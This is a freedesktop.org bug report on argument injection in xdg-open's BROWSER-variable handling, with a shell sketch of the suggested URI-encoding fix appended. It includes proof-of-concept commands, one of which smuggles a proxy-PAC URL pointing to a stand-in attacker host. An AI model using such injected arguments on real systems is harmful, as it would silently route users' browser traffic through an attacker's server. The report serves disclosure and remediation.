<html>
    <head>
      <base href="https://bugs.freedesktop.org/">
    </head>
    <body><table border="1" cellspacing="0" cellpadding="8">
        <tr>
          <th>Bug ID</th>
          <td><a class="bz_bug_link 
          bz_status_NEW "
   title="NEW - Argument injection in xdg-open open_envvar"
   href="https://bugs.freedesktop.org/show_bug.cgi?id=103807">103807</a>
          </td>
        </tr>

        <tr>
          <th>Summary</th>
          <td>Argument injection in xdg-open open_envvar
          </td>
        </tr>

        <tr>
          <th>Product</th>
          <td>Portland
          </td>
        </tr>

        <tr>
          <th>Version</th>
          <td>unspecified
          </td>
        </tr>

        <tr>
          <th>Hardware</th>
          <td>All
          </td>
        </tr>

        <tr>
          <th>OS</th>
          <td>All
          </td>
        </tr>

        <tr>
          <th>Status</th>
          <td>NEW
          </td>
        </tr>

        <tr>
          <th>Severity</th>
          <td>major
          </td>
        </tr>

        <tr>
          <th>Priority</th>
          <td>medium
          </td>
        </tr>

        <tr>
          <th>Component</th>
          <td>xdg-utils
          </td>
        </tr>

        <tr>
          <th>Assignee</th>
          <td>portland-bugs@lists.freedesktop.org
          </td>
        </tr>

        <tr>
          <th>Reporter</th>
          <td>gabriel.corona@enst-bretagne.fr
          </td>
        </tr></table>
      <p>
        <div>
        <pre>xdg-open open_envvar is vulnerable to argument injection when BROWSER contains
%s:

This command:

    BROWSER="chromium %s" xdg-open "<a href="http://www.example.com/">http://www.example.com/</a> --incognito"

will open incognito mode of chromium (when open_envvar mode is used).

The corresponding code is:

    if echo "$browser" | grep -q %s; then
      $(printf "$browser" "$1")

This could be abused to silently set chromium proxy configuration which would
allow an attacker to redirect all of the browser traffic through a server under
his control:

    BROWSER="chromium %s" xdg-open "<a href="http://www.example.com/">http://www.example.com/</a> --proxy-pac-url=<a href="http://dangerous.example.com/proxy.pac">http://dangerous.example.com/proxy.pac</a>"

One possible solution would be to URI-encode IFS characters in $1.

See <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767">https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767</a> for a similar
problem in sensible-browser.</pre>
        </div>
      </p>
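      <p>The fix suggested in the report (URI-encoding IFS characters in $1), sketched as an added example that is not xdg-utils code. The names count_args, open_envvar_unsafe, open_envvar_encoded and encode_ifs are hypothetical, count_args stands in for the browser, and the default IFS (space, tab, newline) is assumed.</p>
      <pre>
```shell
#!/bin/sh
# Added example, not xdg-utils code. All function names are hypothetical.

# Stand-in for the browser: reports how many arguments it received.
count_args() {
    echo "$#"
}

# Same expansion pattern as the code quoted in the report: the printf output
# is word-split on IFS, so whitespace inside the URL yields extra arguments.
open_envvar_unsafe() {
    browser=$1
    url=$2
    $(printf "$browser" "$url")
}

TAB=$(printf '\t')
NL='
'

# Percent-encode the default IFS characters (space, tab, newline) in $1.
encode_ifs() {
    s=$1
    out=
    while [ -n "$s" ]; do
        rest=${s#?}          # everything after the first character
        c=${s%"$rest"}       # the first character itself
        case $c in
            ' ')    out="${out}%20" ;;
            "$TAB") out="${out}%09" ;;
            "$NL")  out="${out}%0A" ;;
            *)      out="${out}${c}" ;;
        esac
        s=$rest
    done
    printf '%s\n' "$out"
}

# Same expansion, but the URL is encoded first and stays a single word.
open_envvar_encoded() {
    browser=$1
    url=$(encode_ifs "$2")
    $(printf "$browser" "$url")
}

# Constructed input taken from the report's first command line.
URL='http://www.example.com/ --incognito'
open_envvar_unsafe 'count_args %s' "$URL"
open_envvar_encoded 'count_args %s' "$URL"
```
      </pre>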


    </body>
</html>